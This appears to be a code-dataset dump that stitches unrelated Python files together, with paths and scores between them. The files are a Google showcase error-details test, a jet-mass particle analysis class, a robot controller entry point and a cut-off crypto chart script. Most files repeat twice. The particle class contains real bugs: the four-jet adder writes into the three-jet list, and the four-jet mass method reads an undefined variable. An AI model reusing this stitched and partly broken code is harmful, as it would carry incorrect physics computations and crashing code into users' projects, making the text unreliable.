))
assert e.details == status.details | tests/system/test_error_details.py |
import pytest
from google import showcase
from google.rpc import error_details_pb2
from google.protobuf import any_pb2
from grpc_status import rpc_status
from google.api_core import exceptions
def create_status(error_details=None):
status = rpc_status.status_pb2.Status()
status.code = 3
status.message = (
"test"
)
status_detail = any_pb2.Any()
if error_details:
status_detail.Pack(error_details)
status.details.append(status_detail)
return status
def test_bad_request_details(echo):
def create_bad_request_details():
bad_request_details = error_details_pb2.BadRequest()
field_violation = bad_request_details.field_violations.add()
field_violation.field = "test field"
field_violation.description = "test description"
return bad_request_details
bad_request_details = create_bad_request_details()
status = create_status(bad_request_details)
with pytest.raises(exceptions.GoogleAPICallError) as e:
_ = echo.echo(showcase.EchoRequest(
error=status,
))
assert e.details == [bad_request_details]
def test_precondition_failure_details(echo):
def create_precondition_failure_details():
pf_details = error_details_pb2.PreconditionFailure()
violation = pf_details.violations.add()
violation.type = "test type"
violation.subject = "test subject"
violation.description = "test description"
return pf_details
pf_details = create_precondition_failure_details()
status = create_status(pf_details)
with pytest.raises(exceptions.GoogleAPICallError) as e:
_ = echo.echo(showcase.EchoRequest(
error=status,
))
assert e.details == [pf_details]
def test_unknown_details(echo):
status = create_status()
with pytest.raises(exceptions.GoogleAPICallError) as e:
_ = echo.echo(showcase.EchoRequest(
error=status,
))
assert e.details == status.details | 0.326593 | 0.261941 |
from __future__ import absolute_import, division, print_function
from time import process_time
import energyflow as ef
import numpy as np
import matplotlib.pyplot as plt
class ParticleDistributionCMS:
def __init__(self, sim):
sim_numbers = set(sim.evns)
t1_start = process_time()
self.event_list = []
self.event_jet_labels = []
self.event_pts = []
self.event_etas = []
self.event_phis = []
self.event_ms = []
i = 1
print("Starting event processing")
for evn_num in sim_numbers:
if i % 1000 == 0:
print("Working on event " + str(i))
self.event_list.append(np.asarray(sim.particles[sim.jets_i[:,sim.evn]==evn_num]))
self.event_jet_labels.append(np.asarray(sim.hard_pids[sim.jets_i[:,sim.evn]==evn_num]))
self.event_pts.append(np.asarray(sim.jet_pts[sim.jets_i[:,sim.evn]==evn_num]))
self.event_etas.append(np.asarray(sim.jet_etas[sim.jets_i[:,sim.evn]==evn_num]))
self.event_phis.append(np.asarray(sim.jet_phis[sim.jets_i[:,sim.evn]==evn_num]))
self.event_ms.append(np.asarray(sim.jet_ms[sim.jets_i[:,sim.evn]==evn_num]))
if i % 1000 == 0:
print(str(i) + " events processed")
i += 1
print()
i = 1
print("Starting mass calculation")
self.event_stats = []
for i in range(len(self.event_pts)):
self.event_stats.append([])
for j in range(len(self.event_pts[i])):
ptyphims = []
ptyphims.append(self.event_pts[i][j])
ptyphims.append(self.event_etas[i][j])
ptyphims.append(self.event_phis[i][j])
ptyphims.append(self.event_ms[i][j])
p4s = ef.p4s_from_ptyphims(np.array(ptyphims))
self.event_stats[i].append(p4s.tolist())
if i % 1000 == 0:
print(str(i) + " event masses calculated")
i += 1
t1_stop = process_time()
print("Elapsed time during the whole program in seconds:", t1_stop-t1_start)
def max_jets_in_event(self):
max_jets_in_event = max([len(self.event_pts[i]) for i in range(len(self.event_pts))])
return max_jets_in_event
def num_events(self):
return len(self.event_pts)
def choose_1jet_events(self):
self.event_list_1 = []
indexes = []
i = 0
for evn in self.event_list:
if len(evn) == 1:
self.event_list_1.append(evn)
indexes.append(i)
i += 1
self.event_stats_1 = [self.event_stats[j] for j in indexes]
self.event_jet_labels_1 = [self.event_jet_labels[j] for j in indexes]
def choose_2jet_events(self):
self.event_list_2 = []
indexes = []
i = 0
for evn in self.event_list:
if len(evn) == 2:
self.event_list_2.append(evn)
indexes.append(i)
i += 1
self.event_stats_2 = [self.event_stats[j] for j in indexes]
self.event_jet_labels_2 = [self.event_jet_labels[j] for j in indexes]
def choose_3jet_events(self):
self.event_list_3 = []
indexes = []
i = 0
for evn in self.event_list:
if len(evn) == 3:
self.event_list_3.append(evn)
indexes.append(i)
i += 1
self.event_stats_3 = [self.event_stats[j] for j in indexes]
self.event_jet_labels_3 = [self.event_jet_labels[j] for j in indexes]
def choose_4jet_events(self):
self.event_list_4 = []
indexes = []
i = 0
for evn in self.event_list:
if len(evn) == 4:
self.event_list_4.append(evn)
indexes.append(i)
i += 1
self.event_stats_4 = [self.event_stats[j] for j in indexes]
self.event_jet_labels_4 = [self.event_jet_labels[j] for j in indexes]
def length_1jet_events(self):
return len(self.event_list_1)
def length_2jet_events(self):
return len(self.event_list_2)
def length_3jet_events(self):
return len(self.event_list_3)
def length_4jet_events(self):
return len(self.event_list_4)
def add_event4vectors_1jet(self):
self.event_stats_added_1 = []
for i in range(len(self.event_stats_1)):
event_1 = self.event_stats_1[i][0][0]
event_2 = self.event_stats_1[i][0][1]
event_3 = self.event_stats_1[i][0][2]
event_4 = self.event_stats_1[i][0][3]
event = [event_1, event_2, event_3, event_4]
self.event_stats_added_1.append(event)
def add_event4vectors_2jet(self):
self.event_stats_added_2 = []
for i in range(len(self.event_stats_2)):
event_1 = self.event_stats_2[i][0][0] + self.event_stats_2[i][1][0]
event_2 = self.event_stats_2[i][0][1] + self.event_stats_2[i][1][1]
event_3 = self.event_stats_2[i][0][2] + self.event_stats_2[i][1][2]
event_4 = self.event_stats_2[i][0][3] + self.event_stats_2[i][1][3]
event = [event_1, event_2, event_3, event_4]
self.event_stats_added_2.append(event)
def add_event4vectors_3jet(self):
self.event_stats_added_3 = []
for i in range(len(self.event_stats_3)):
event_1 = self.event_stats_3[i][0][0] + self.event_stats_3[i][1][0] + self.event_stats_3[i][2][0]
event_2 = self.event_stats_3[i][0][1] + self.event_stats_3[i][1][1] + self.event_stats_3[i][2][1]
event_3 = self.event_stats_3[i][0][2] + self.event_stats_3[i][1][2] + self.event_stats_3[i][2][2]
event_4 = self.event_stats_3[i][0][3] + self.event_stats_3[i][1][3] + self.event_stats_3[i][2][3]
event = [event_1, event_2, event_3, event_4]
self.event_stats_added_3.append(event)
def add_event4vectors_4jet(self):
self.event_stats_added_4 = []
for i in range(len(self.event_stats_4)):
event_1 = self.event_stats_4[i][0][0] + self.event_stats_4[i][1][0] + self.event_stats_4[i][2][0] + self.event_stats_4[i][3][0]
event_2 = self.event_stats_4[i][0][1] + self.event_stats_4[i][1][1] + self.event_stats_4[i][2][1] + self.event_stats_4[i][3][1]
event_3 = self.event_stats_4[i][0][2] + self.event_stats_4[i][1][2] + self.event_stats_4[i][2][2] + self.event_stats_4[i][3][2]
event_4 = self.event_stats_4[i][0][3] + self.event_stats_4[i][1][3] + self.event_stats_4[i][2][3] + self.event_stats_4[i][3][3]
event = [event_1, event_2, event_3, event_4]
self.event_stats_added_3.append(event)
def event_mass_1jet(self):
self.event_mass_1jet = []
for event_4_vector in self.event_stats_added_1:
event_4_list = list(event_4_vector)
event_4_array = np.array(event_4_list)
event_mass = ef.ms_from_p4s(event_4_array)
self.event_mass_1jet.append(event_mass)
def event_mass_2jet(self):
self.event_mass_2jet = []
for event_4_vector in self.event_stats_added_2:
event_4_list = list(event_4_vector)
event_4_array = np.array(event_4_list)
event_mass = ef.ms_from_p4s(event_4_array)
self.event_mass_2jet.append(event_mass)
def event_mass_3jet(self):
self.event_mass_3jet = []
for event_4_vector in self.event_stats_added_3:
event_4_list = list(event_4_vector)
event_4_array = np.array(event_4_list)
event_mass = ef.ms_from_p4s(event_4_array)
self.event_mass_3jet.append(event_mass)
def event_mass_4jet(self):
self.event_mass_4jet = []
for event_4_vector in event_stats_added_4:
event_4_list = list(event_4_vector)
event_4_array = np.array(event_4_list)
event_mass = ef.ms_from_p4s(event_4_array)
self.event_mass_4jet.append(event_mass)
def max_event_njet(self, n):
if n == 1:
return max(self.event_mass_1jet)
elif n == 2:
return max(self.event_mass_2jet)
elif n == 3:
return max(self.event_mass_3jet)
elif n == 4:
return max(self.event_mass_4jet)
else:
print("No masses calculated for events of this size") | build/lib/particledist/ParticleDistributionCMS.py |
from __future__ import absolute_import, division, print_function
from time import process_time
import energyflow as ef
import numpy as np
import matplotlib.pyplot as plt
class ParticleDistributionCMS:
def __init__(self, sim):
sim_numbers = set(sim.evns)
t1_start = process_time()
self.event_list = []
self.event_jet_labels = []
self.event_pts = []
self.event_etas = []
self.event_phis = []
self.event_ms = []
i = 1
print("Starting event processing")
for evn_num in sim_numbers:
if i % 1000 == 0:
print("Working on event " + str(i))
self.event_list.append(np.asarray(sim.particles[sim.jets_i[:,sim.evn]==evn_num]))
self.event_jet_labels.append(np.asarray(sim.hard_pids[sim.jets_i[:,sim.evn]==evn_num]))
self.event_pts.append(np.asarray(sim.jet_pts[sim.jets_i[:,sim.evn]==evn_num]))
self.event_etas.append(np.asarray(sim.jet_etas[sim.jets_i[:,sim.evn]==evn_num]))
self.event_phis.append(np.asarray(sim.jet_phis[sim.jets_i[:,sim.evn]==evn_num]))
self.event_ms.append(np.asarray(sim.jet_ms[sim.jets_i[:,sim.evn]==evn_num]))
if i % 1000 == 0:
print(str(i) + " events processed")
i += 1
print()
i = 1
print("Starting mass calculation")
self.event_stats = []
for i in range(len(self.event_pts)):
self.event_stats.append([])
for j in range(len(self.event_pts[i])):
ptyphims = []
ptyphims.append(self.event_pts[i][j])
ptyphims.append(self.event_etas[i][j])
ptyphims.append(self.event_phis[i][j])
ptyphims.append(self.event_ms[i][j])
p4s = ef.p4s_from_ptyphims(np.array(ptyphims))
self.event_stats[i].append(p4s.tolist())
if i % 1000 == 0:
print(str(i) + " event masses calculated")
i += 1
t1_stop = process_time()
print("Elapsed time during the whole program in seconds:", t1_stop-t1_start)
def max_jets_in_event(self):
max_jets_in_event = max([len(self.event_pts[i]) for i in range(len(self.event_pts))])
return max_jets_in_event
def num_events(self):
return len(self.event_pts)
def choose_1jet_events(self):
self.event_list_1 = []
indexes = []
i = 0
for evn in self.event_list:
if len(evn) == 1:
self.event_list_1.append(evn)
indexes.append(i)
i += 1
self.event_stats_1 = [self.event_stats[j] for j in indexes]
self.event_jet_labels_1 = [self.event_jet_labels[j] for j in indexes]
def choose_2jet_events(self):
self.event_list_2 = []
indexes = []
i = 0
for evn in self.event_list:
if len(evn) == 2:
self.event_list_2.append(evn)
indexes.append(i)
i += 1
self.event_stats_2 = [self.event_stats[j] for j in indexes]
self.event_jet_labels_2 = [self.event_jet_labels[j] for j in indexes]
def choose_3jet_events(self):
self.event_list_3 = []
indexes = []
i = 0
for evn in self.event_list:
if len(evn) == 3:
self.event_list_3.append(evn)
indexes.append(i)
i += 1
self.event_stats_3 = [self.event_stats[j] for j in indexes]
self.event_jet_labels_3 = [self.event_jet_labels[j] for j in indexes]
def choose_4jet_events(self):
self.event_list_4 = []
indexes = []
i = 0
for evn in self.event_list:
if len(evn) == 4:
self.event_list_4.append(evn)
indexes.append(i)
i += 1
self.event_stats_4 = [self.event_stats[j] for j in indexes]
self.event_jet_labels_4 = [self.event_jet_labels[j] for j in indexes]
def length_1jet_events(self):
return len(self.event_list_1)
def length_2jet_events(self):
return len(self.event_list_2)
def length_3jet_events(self):
return len(self.event_list_3)
def length_4jet_events(self):
return len(self.event_list_4)
def add_event4vectors_1jet(self):
self.event_stats_added_1 = []
for i in range(len(self.event_stats_1)):
event_1 = self.event_stats_1[i][0][0]
event_2 = self.event_stats_1[i][0][1]
event_3 = self.event_stats_1[i][0][2]
event_4 = self.event_stats_1[i][0][3]
event = [event_1, event_2, event_3, event_4]
self.event_stats_added_1.append(event)
def add_event4vectors_2jet(self):
self.event_stats_added_2 = []
for i in range(len(self.event_stats_2)):
event_1 = self.event_stats_2[i][0][0] + self.event_stats_2[i][1][0]
event_2 = self.event_stats_2[i][0][1] + self.event_stats_2[i][1][1]
event_3 = self.event_stats_2[i][0][2] + self.event_stats_2[i][1][2]
event_4 = self.event_stats_2[i][0][3] + self.event_stats_2[i][1][3]
event = [event_1, event_2, event_3, event_4]
self.event_stats_added_2.append(event)
def add_event4vectors_3jet(self):
self.event_stats_added_3 = []
for i in range(len(self.event_stats_3)):
event_1 = self.event_stats_3[i][0][0] + self.event_stats_3[i][1][0] + self.event_stats_3[i][2][0]
event_2 = self.event_stats_3[i][0][1] + self.event_stats_3[i][1][1] + self.event_stats_3[i][2][1]
event_3 = self.event_stats_3[i][0][2] + self.event_stats_3[i][1][2] + self.event_stats_3[i][2][2]
event_4 = self.event_stats_3[i][0][3] + self.event_stats_3[i][1][3] + self.event_stats_3[i][2][3]
event = [event_1, event_2, event_3, event_4]
self.event_stats_added_3.append(event)
def add_event4vectors_4jet(self):
self.event_stats_added_4 = []
for i in range(len(self.event_stats_4)):
event_1 = self.event_stats_4[i][0][0] + self.event_stats_4[i][1][0] + self.event_stats_4[i][2][0] + self.event_stats_4[i][3][0]
event_2 = self.event_stats_4[i][0][1] + self.event_stats_4[i][1][1] + self.event_stats_4[i][2][1] + self.event_stats_4[i][3][1]
event_3 = self.event_stats_4[i][0][2] + self.event_stats_4[i][1][2] + self.event_stats_4[i][2][2] + self.event_stats_4[i][3][2]
event_4 = self.event_stats_4[i][0][3] + self.event_stats_4[i][1][3] + self.event_stats_4[i][2][3] + self.event_stats_4[i][3][3]
event = [event_1, event_2, event_3, event_4]
self.event_stats_added_3.append(event)
def event_mass_1jet(self):
self.event_mass_1jet = []
for event_4_vector in self.event_stats_added_1:
event_4_list = list(event_4_vector)
event_4_array = np.array(event_4_list)
event_mass = ef.ms_from_p4s(event_4_array)
self.event_mass_1jet.append(event_mass)
def event_mass_2jet(self):
self.event_mass_2jet = []
for event_4_vector in self.event_stats_added_2:
event_4_list = list(event_4_vector)
event_4_array = np.array(event_4_list)
event_mass = ef.ms_from_p4s(event_4_array)
self.event_mass_2jet.append(event_mass)
def event_mass_3jet(self):
self.event_mass_3jet = []
for event_4_vector in self.event_stats_added_3:
event_4_list = list(event_4_vector)
event_4_array = np.array(event_4_list)
event_mass = ef.ms_from_p4s(event_4_array)
self.event_mass_3jet.append(event_mass)
def event_mass_4jet(self):
self.event_mass_4jet = []
for event_4_vector in event_stats_added_4:
event_4_list = list(event_4_vector)
event_4_array = np.array(event_4_list)
event_mass = ef.ms_from_p4s(event_4_array)
self.event_mass_4jet.append(event_mass)
def max_event_njet(self, n):
if n == 1:
return max(self.event_mass_1jet)
elif n == 2:
return max(self.event_mass_2jet)
elif n == 3:
return max(self.event_mass_3jet)
elif n == 4:
return max(self.event_mass_4jet)
else:
print("No masses calculated for events of this size") | 0.300027 | 0.211335 |
import asyncio
import math
import os
from collections import deque
from typing import List
import rplidar
from serial.tools import list_ports
from highlevel.adapter.http import HTTPClient
from highlevel.adapter.lidar import LIDARAdapter
from highlevel.adapter.lidar.rplidar import RPLIDARAdapter
from highlevel.adapter.lidar.simulated import SimulatedLIDARAdapter
from highlevel.adapter.socket import SocketAdapter
from highlevel.adapter.socket.isotp import ISOTPSocketAdapter
from highlevel.adapter.socket.loopback import LoopbackSocketAdapter
from highlevel.adapter.web_browser import WebBrowserClient
from highlevel.robot.controller.actuator import ActuatorController
from highlevel.robot.controller.debug import DebugController
from highlevel.robot.controller.match_action import MatchActionController
from highlevel.robot.controller.motion.motion import MotionController
from highlevel.robot.controller.motion.position import PositionController
from highlevel.robot.controller.motion.trajectory import TrajectoryController
from highlevel.robot.controller.obstacle import ObstacleController
from highlevel.robot.controller.strategy import StrategyController
from highlevel.robot.controller.symmetry import SymmetryController
from highlevel.robot.entity.color import Color
from highlevel.robot.entity.configuration import Configuration
from highlevel.robot.entity.configuration import DebugConfiguration
from highlevel.robot.entity.network import NB_SERVO_BOARDS, NET_ADDRESSES_SERVO, NET_ADDRESS_MOTOR
from highlevel.robot.gateway.actuator import ActuatorGateway
from highlevel.robot.gateway.motor import MotorGateway
from highlevel.robot.router import ProtobufRouter
from highlevel.simulation.controller.runner import SimulationRunner
from highlevel.simulation.entity.simulation_configuration import SimulationConfiguration
from highlevel.simulation.entity.simulation_state import SimulationState
from highlevel.simulation.gateway.simulation import SimulationGateway
from highlevel.simulation.router import SimulationRouter
from highlevel.util.clock import RealClock, FakeClock
from highlevel.util.dependency_container import DependencyContainer
from highlevel.util.filter.odometry import odometry_arc
from highlevel.util.filter.pid import PIDConstants, PIDLimits
from highlevel.util.geometry.segment import Segment
from highlevel.util.geometry.vector import Vector2
from highlevel.util.perf_metrics import print_performance_metrics
from highlevel.util.probe import Probe
from highlevel.util.replay_saver import ReplaySaver
CONFIG = Configuration(
initial_position=Vector2(200, 1200),
initial_angle=0,
robot_width=380,
robot_length=240,
field_shape=(3000, 2000),
color=Color.BLUE,
wheel_radius=73.8 / 2,
encoder_ticks_per_revolution=2400,
distance_between_wheels=364.26, # old: 357
encoder_update_rate=100,
motor_update_rate=1000,
pid_scale_factor=2**16,
max_wheel_speed=600,
max_wheel_acceleration=1000,
max_angular_velocity=1.0 * math.pi,
max_angular_acceleration=1.4 * math.pi,
tolerance_distance=1,
tolerance_angle=0.01,
trapezoid_anticipation=1.1,
debug=DebugConfiguration(
websocket_port=8080,
http_port=9090,
host='0.0.0.0',
refresh_rate=4,
),
pid_constants_distance=PIDConstants(10, 0, 0),
pid_constants_angle=PIDConstants(10, 0, 0),
pid_constants_position_left=PIDConstants(2, 0.0, 1.5),
pid_constants_position_right=PIDConstants(2, 0.0, 1.5),
pid_constants_speed_left=PIDConstants(0.39, 2.0, 0.0018),
pid_constants_speed_right=PIDConstants(0.39, 2.0, 0.0018),
pid_limits_distance=PIDLimits(1e2, 1e2, 0.0),
pid_limits_angle=PIDLimits(4.0, 4.0, 0.000),
)
SIMULATION_CONFIG = SimulationConfiguration(
speed_factor=1e100, # Run the simulation as fast as possible.
tickrate=100,
replay_fps=60,
lidar_position_rate=11,
obstacles=[
Segment(start=Vector2(0, 0), end=Vector2(0, CONFIG.field_shape[1])),
Segment(start=Vector2(0, 0), end=Vector2(CONFIG.field_shape[0], 0)),
Segment(start=Vector2(*CONFIG.field_shape),
end=Vector2(0, CONFIG.field_shape[1])),
Segment(start=Vector2(*CONFIG.field_shape),
end=Vector2(CONFIG.field_shape[0], 0)),
])
async def _get_container(simulation: bool, stub_lidar: bool,
stub_socket_can: bool) -> DependencyContainer:
"""
Build the dependency container.
"""
i = DependencyContainer()
i.provide('configuration', CONFIG)
i.provide('protobuf_router', ProtobufRouter)
i.provide('odometry_function', lambda: odometry_arc)
i.provide('position_controller', PositionController)
i.provide('motor_gateway', MotorGateway)
i.provide('motion_controller', MotionController)
i.provide('trajectory_controller', TrajectoryController)
i.provide('strategy_controller', StrategyController)
i.provide('symmetry_controller', SymmetryController)
i.provide('obstacle_controller', ObstacleController)
i.provide('debug_controller', DebugController)
i.provide('match_action_controller', MatchActionController)
i.provide('probe', Probe)
i.provide('event_loop', asyncio.get_event_loop())
i.provide('http_client', HTTPClient)
i.provide('web_browser_client', WebBrowserClient)
i.provide('replay_saver', ReplaySaver)
if simulation:
i.provide('simulation_configuration', SIMULATION_CONFIG)
i.provide('simulation_router', SimulationRouter)
i.provide('simulation_runner', SimulationRunner)
i.provide(
'simulation_state',
SimulationState(time=0,
cups=[],
left_tick=0,
right_tick=0,
left_speed=0,
right_speed=0,
queue_speed_left=deque(),
queue_speed_right=deque(),
last_position_update=0,
last_lidar_update=0))
i.provide('simulation_gateway', SimulationGateway)
i.provide('clock', FakeClock)
else:
i.provide('clock', RealClock)
if simulation or stub_lidar:
i.provide('lidar_adapter', SimulatedLIDARAdapter)
else:
rplidar_obj = rplidar.RPLidar(list_ports.comports()[0].device)
i.provide('rplidar_object', rplidar_obj)
i.provide('lidar_adapter', RPLIDARAdapter)
servo_adapter_list: List[SocketAdapter] = []
if simulation or stub_socket_can:
i.provide('motor_board_adapter', LoopbackSocketAdapter)
for _ in range(NB_SERVO_BOARDS):
servo_adapter_list.append(LoopbackSocketAdapter())
else:
i.provide('motor_board_adapter',
ISOTPSocketAdapter,
address=NET_ADDRESS_MOTOR,
adapter_name='motor_board')
for index in range(NB_SERVO_BOARDS):
servo_adapter_list.append(
ISOTPSocketAdapter(address=NET_ADDRESSES_SERVO[index],
adapter_name="servo_board_" + str(index)))
i.provide('servo_adapters_list', servo_adapter_list)
i.provide('actuator_gateway', ActuatorGateway)
i.provide('actuator_controller', ActuatorController)
return i
# pylint: disable=too-many-locals
async def main() -> None:
"""
Main function.
Launch the simulation and the robot.
"""
is_simulation = os.environ.get('OUTECH_SIMULATION',
'true').lower() == 'true'
stub_lidar = os.environ.get('STUB_LIDAR', 'false').lower() == 'true'
stub_socket_can = os.environ.get('STUB_SOCKET_CAN',
'false').lower() == 'true'
i = await _get_container(is_simulation, stub_lidar, stub_socket_can)
# Setup adapters
lidar_adapter: LIDARAdapter = i.get('lidar_adapter')
obstacle_controller: ObstacleController = i.get('obstacle_controller')
lidar_adapter.register_callback(obstacle_controller.set_detection)
motor_board_adapter: SocketAdapter = i.get('motor_board_adapter')
servo_board_adapters: List[SocketAdapter] = i.get('servo_adapters_list')
await motor_board_adapter.init()
for adapter in servo_board_adapters:
await adapter.init()
# Register the CAN bus to call the router.
protobuf_router: ProtobufRouter = i.get('protobuf_router')
await motor_board_adapter.init()
motor_board_adapter.register_callback(protobuf_router.decode_message)
if is_simulation:
simulation_router: SimulationRouter = i.get('simulation_router')
motor_board_adapter.register_callback(
simulation_router.handle_movement_order)
strategy_controller = i.get('strategy_controller')
debug_controller = i.get('debug_controller')
coroutines_to_run = {
strategy_controller.run(),
debug_controller.run(),
motor_board_adapter.run(),
print_performance_metrics(),
}
if is_simulation:
simulation_runner = i.get('simulation_runner')
coroutines_to_run.add(simulation_runner.run())
done, pending = await asyncio.wait(coroutines_to_run,
return_when=asyncio.FIRST_COMPLETED)
# Gather the done coroutines to have proper stacktraces.
await asyncio.gather(*done)
# Cancel every coroutines that have not stopped yet.
gather = asyncio.gather(*pending)
gather.cancel()
try:
await gather
except asyncio.CancelledError:
pass
replay_saver = i.get('replay_saver')
replay_saver.save_replay()
if __name__ == '__main__':
asyncio.run(main()) | highlevel/main.py | import asyncio
import math
import os
from collections import deque
from typing import List
import rplidar
from serial.tools import list_ports
from highlevel.adapter.http import HTTPClient
from highlevel.adapter.lidar import LIDARAdapter
from highlevel.adapter.lidar.rplidar import RPLIDARAdapter
from highlevel.adapter.lidar.simulated import SimulatedLIDARAdapter
from highlevel.adapter.socket import SocketAdapter
from highlevel.adapter.socket.isotp import ISOTPSocketAdapter
from highlevel.adapter.socket.loopback import LoopbackSocketAdapter
from highlevel.adapter.web_browser import WebBrowserClient
from highlevel.robot.controller.actuator import ActuatorController
from highlevel.robot.controller.debug import DebugController
from highlevel.robot.controller.match_action import MatchActionController
from highlevel.robot.controller.motion.motion import MotionController
from highlevel.robot.controller.motion.position import PositionController
from highlevel.robot.controller.motion.trajectory import TrajectoryController
from highlevel.robot.controller.obstacle import ObstacleController
from highlevel.robot.controller.strategy import StrategyController
from highlevel.robot.controller.symmetry import SymmetryController
from highlevel.robot.entity.color import Color
from highlevel.robot.entity.configuration import Configuration
from highlevel.robot.entity.configuration import DebugConfiguration
from highlevel.robot.entity.network import NB_SERVO_BOARDS, NET_ADDRESSES_SERVO, NET_ADDRESS_MOTOR
from highlevel.robot.gateway.actuator import ActuatorGateway
from highlevel.robot.gateway.motor import MotorGateway
from highlevel.robot.router import ProtobufRouter
from highlevel.simulation.controller.runner import SimulationRunner
from highlevel.simulation.entity.simulation_configuration import SimulationConfiguration
from highlevel.simulation.entity.simulation_state import SimulationState
from highlevel.simulation.gateway.simulation import SimulationGateway
from highlevel.simulation.router import SimulationRouter
from highlevel.util.clock import RealClock, FakeClock
from highlevel.util.dependency_container import DependencyContainer
from highlevel.util.filter.odometry import odometry_arc
from highlevel.util.filter.pid import PIDConstants, PIDLimits
from highlevel.util.geometry.segment import Segment
from highlevel.util.geometry.vector import Vector2
from highlevel.util.perf_metrics import print_performance_metrics
from highlevel.util.probe import Probe
from highlevel.util.replay_saver import ReplaySaver
CONFIG = Configuration(
initial_position=Vector2(200, 1200),
initial_angle=0,
robot_width=380,
robot_length=240,
field_shape=(3000, 2000),
color=Color.BLUE,
wheel_radius=73.8 / 2,
encoder_ticks_per_revolution=2400,
distance_between_wheels=364.26, # old: 357
encoder_update_rate=100,
motor_update_rate=1000,
pid_scale_factor=2**16,
max_wheel_speed=600,
max_wheel_acceleration=1000,
max_angular_velocity=1.0 * math.pi,
max_angular_acceleration=1.4 * math.pi,
tolerance_distance=1,
tolerance_angle=0.01,
trapezoid_anticipation=1.1,
debug=DebugConfiguration(
websocket_port=8080,
http_port=9090,
host='0.0.0.0',
refresh_rate=4,
),
pid_constants_distance=PIDConstants(10, 0, 0),
pid_constants_angle=PIDConstants(10, 0, 0),
pid_constants_position_left=PIDConstants(2, 0.0, 1.5),
pid_constants_position_right=PIDConstants(2, 0.0, 1.5),
pid_constants_speed_left=PIDConstants(0.39, 2.0, 0.0018),
pid_constants_speed_right=PIDConstants(0.39, 2.0, 0.0018),
pid_limits_distance=PIDLimits(1e2, 1e2, 0.0),
pid_limits_angle=PIDLimits(4.0, 4.0, 0.000),
)
SIMULATION_CONFIG = SimulationConfiguration(
speed_factor=1e100, # Run the simulation as fast as possible.
tickrate=100,
replay_fps=60,
lidar_position_rate=11,
obstacles=[
Segment(start=Vector2(0, 0), end=Vector2(0, CONFIG.field_shape[1])),
Segment(start=Vector2(0, 0), end=Vector2(CONFIG.field_shape[0], 0)),
Segment(start=Vector2(*CONFIG.field_shape),
end=Vector2(0, CONFIG.field_shape[1])),
Segment(start=Vector2(*CONFIG.field_shape),
end=Vector2(CONFIG.field_shape[0], 0)),
])
async def _get_container(simulation: bool, stub_lidar: bool,
stub_socket_can: bool) -> DependencyContainer:
"""
Build the dependency container.
"""
i = DependencyContainer()
i.provide('configuration', CONFIG)
i.provide('protobuf_router', ProtobufRouter)
i.provide('odometry_function', lambda: odometry_arc)
i.provide('position_controller', PositionController)
i.provide('motor_gateway', MotorGateway)
i.provide('motion_controller', MotionController)
i.provide('trajectory_controller', TrajectoryController)
i.provide('strategy_controller', StrategyController)
i.provide('symmetry_controller', SymmetryController)
i.provide('obstacle_controller', ObstacleController)
i.provide('debug_controller', DebugController)
i.provide('match_action_controller', MatchActionController)
i.provide('probe', Probe)
i.provide('event_loop', asyncio.get_event_loop())
i.provide('http_client', HTTPClient)
i.provide('web_browser_client', WebBrowserClient)
i.provide('replay_saver', ReplaySaver)
if simulation:
i.provide('simulation_configuration', SIMULATION_CONFIG)
i.provide('simulation_router', SimulationRouter)
i.provide('simulation_runner', SimulationRunner)
i.provide(
'simulation_state',
SimulationState(time=0,
cups=[],
left_tick=0,
right_tick=0,
left_speed=0,
right_speed=0,
queue_speed_left=deque(),
queue_speed_right=deque(),
last_position_update=0,
last_lidar_update=0))
i.provide('simulation_gateway', SimulationGateway)
i.provide('clock', FakeClock)
else:
i.provide('clock', RealClock)
if simulation or stub_lidar:
i.provide('lidar_adapter', SimulatedLIDARAdapter)
else:
rplidar_obj = rplidar.RPLidar(list_ports.comports()[0].device)
i.provide('rplidar_object', rplidar_obj)
i.provide('lidar_adapter', RPLIDARAdapter)
servo_adapter_list: List[SocketAdapter] = []
if simulation or stub_socket_can:
i.provide('motor_board_adapter', LoopbackSocketAdapter)
for _ in range(NB_SERVO_BOARDS):
servo_adapter_list.append(LoopbackSocketAdapter())
else:
i.provide('motor_board_adapter',
ISOTPSocketAdapter,
address=NET_ADDRESS_MOTOR,
adapter_name='motor_board')
for index in range(NB_SERVO_BOARDS):
servo_adapter_list.append(
ISOTPSocketAdapter(address=NET_ADDRESSES_SERVO[index],
adapter_name="servo_board_" + str(index)))
i.provide('servo_adapters_list', servo_adapter_list)
i.provide('actuator_gateway', ActuatorGateway)
i.provide('actuator_controller', ActuatorController)
return i
# pylint: disable=too-many-locals
async def main() -> None:
"""
Main function.
Launch the simulation and the robot.
"""
is_simulation = os.environ.get('OUTECH_SIMULATION',
'true').lower() == 'true'
stub_lidar = os.environ.get('STUB_LIDAR', 'false').lower() == 'true'
stub_socket_can = os.environ.get('STUB_SOCKET_CAN',
'false').lower() == 'true'
i = await _get_container(is_simulation, stub_lidar, stub_socket_can)
# Setup adapters
lidar_adapter: LIDARAdapter = i.get('lidar_adapter')
obstacle_controller: ObstacleController = i.get('obstacle_controller')
lidar_adapter.register_callback(obstacle_controller.set_detection)
motor_board_adapter: SocketAdapter = i.get('motor_board_adapter')
servo_board_adapters: List[SocketAdapter] = i.get('servo_adapters_list')
await motor_board_adapter.init()
for adapter in servo_board_adapters:
await adapter.init()
# Register the CAN bus to call the router.
protobuf_router: ProtobufRouter = i.get('protobuf_router')
await motor_board_adapter.init()
motor_board_adapter.register_callback(protobuf_router.decode_message)
if is_simulation:
simulation_router: SimulationRouter = i.get('simulation_router')
motor_board_adapter.register_callback(
simulation_router.handle_movement_order)
strategy_controller = i.get('strategy_controller')
debug_controller = i.get('debug_controller')
coroutines_to_run = {
strategy_controller.run(),
debug_controller.run(),
motor_board_adapter.run(),
print_performance_metrics(),
}
if is_simulation:
simulation_runner = i.get('simulation_runner')
coroutines_to_run.add(simulation_runner.run())
done, pending = await asyncio.wait(coroutines_to_run,
return_when=asyncio.FIRST_COMPLETED)
# Gather the done coroutines to have proper stacktraces.
await asyncio.gather(*done)
# Cancel every coroutines that have not stopped yet.
gather = asyncio.gather(*pending)
gather.cancel()
try:
await gather
except asyncio.CancelledError:
pass
replay_saver = i.get('replay_saver')
replay_saver.save_replay()
if __name__ == '__main__':
asyncio.run(main()) | 0.578686 | 0.190611 |
import sys
import matplotlib
import wx
matplotlib.use("WXAgg")
matplotlib.rcParams['toolbar'] = 'None'
import matplotlib.pyplot as plt
import pylab
import btceapi
class Chart(object):
def __init__(self, symbol):
self.symbol = symbol
self.base = symbol.split("_")[0].upper()
self.alt = symbol.split("_")[1].upper()
self.ticks = btceapi.getTradeHistory(self.symbol)
